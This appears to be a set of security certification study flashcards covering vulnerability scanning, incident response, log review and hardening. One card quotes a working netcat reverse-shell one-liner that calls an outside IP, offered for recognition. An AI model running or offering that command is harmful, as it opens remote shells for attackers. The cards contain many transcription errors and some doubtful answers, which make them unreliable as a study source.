Chapter 2 Flashcards
(71 cards)
The chief information security officer wants to eliminate and reduce Shadow IT in the enterprise. Several high risk cloud applications are used to increase the risk to the organization, which of the following solutions will assist in reducing the risks.
An end of life date was announced for a widely used OS. A business critical function is performed by some machinery that is controlled by PC, which is utilizing the OS that is approaching the end of life date which of the following best describes a security analyst concern.
Any discovered vulnerabilities will not be remediated
A security analyst needs to block, vulnerable ports, and disable legacy protocols. The analyst is insured net bios, Trio, Telnet, SMB and TFTP are blocked and or disabled which of the following additional protocols should the analyst block next
SNMP version one
During a scan of a Web server in the perimeter network of vulnerability was identified that could be exploited over report 3389. The web server is protected by a WAF, which of the following best represents the change to overall risk associated with a vulnerability.
The risk would increase because the host is external facing
An organization would like to ensure it’s cloud infrastructure has hardened configuration. A requirement is to create a server image that can be deployed with a secure template which of the following is the best resource to ensure secure configuration.
CIS benchmarks
A cyber security analyst has recovered a recently compromise server to its previous state which of the following should the analyst perform next
Forensic analysis
A payroll department employee was the target of a fishing attack in which attacker impersonated the department director and requested that direct deposit information should be updated to a new account after a deposit was made to an unauthorized account which of the following is the first action the incident response team should take when they receive notification of the attack
Review the actions already taken by the employee, and the email related to the event
A penetration tester submitted data to a form in a web application which enabled penetration tester to retrieve user credentials, which of the following should be recommended for remediation of this application vulnerability
Performing input validation before allowing sub submission
A security analyst detected the following suspicious activity, which of the following is the most likely describes the activity
rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234>tmp/f
Reverse shell
An incident response analyst notices multiple emails, traversing the network that target only the administrator of the company. The email contains a concealed URL that leads to an unknown website and another country which of the following best describes what is happening.
Social engineering attack
Obfuscated links
The web facing application team notifies a SOC analyst but there are thousands ofHTTP/404 events on the public facing Web server which of the following is the next step for the analyst to take
Identify the IP/host name for the request and look at the related activity
A security analyst needs to provide evidence of a regular vulnerability scanning on the companies network for an auditing process which of the following is an example of a tool that can produce such evidence
Open VAS
A security analyst is performing vulnerability scans on the network the analyst installs a scanner appliance configure the subnet to scan and begin, begins the scan of the network which of the following would be missing from a scan performed with this configuration
Registry key values
Which of the following is a nation state act least likely to be concerned with
Forensic analysis for legal actions taken
System administrator needs to gather security events with repeatable patterns from Lennox log files which of the following would the administrator most likely use for this task?
A regular expression
In bash
A security analyst is responding to an incident that evolves a malicious attack on a network data closet which of the following best explains how the analyst should properly document the incident
Take photos of the impacted items
A user is suspected of violating policy by logging into a Linux PM during non-business hours which of the following system files is the best way to track the users activities
/var/log/secure
The vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint only three can be remediated, which of the following represents the least impactful risk given the CVSS 3.1 base scores
AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L - base score 6.5
Security analyst can review the windows registry on end points to get insights into
 system critical configuration items
A cyber security analyst is reviewing SREM logs and observes consistent request originating from an internal host to a block list of external server which of the following best describes the activity that is taking place
Beaconing
While revealing Web server logs and analyst notices several entries with the same time stamps, but all contain odd characters in the request line, which of the following steps should be taken next
Determine what attack the odd characters are indicative of
The cyber security analyst is tasked with scanning a web application to understand where the scan will go, and whether there are URLs that should be denied access prior to more in-depth scanning which of the following best fits the type of scanning activity requested
Discovery scan
A vulnerability analyst is writing a report, documenting the newest most critical vulnerabilities identified in the past month which of the following public MITRE repositories will be best to review
Common vulnerabilities and exposures
Assistance analyst is limiting user access to system configuration keys and values in a Windows environment which of the following describes where the In Law can find these configuration items
Registry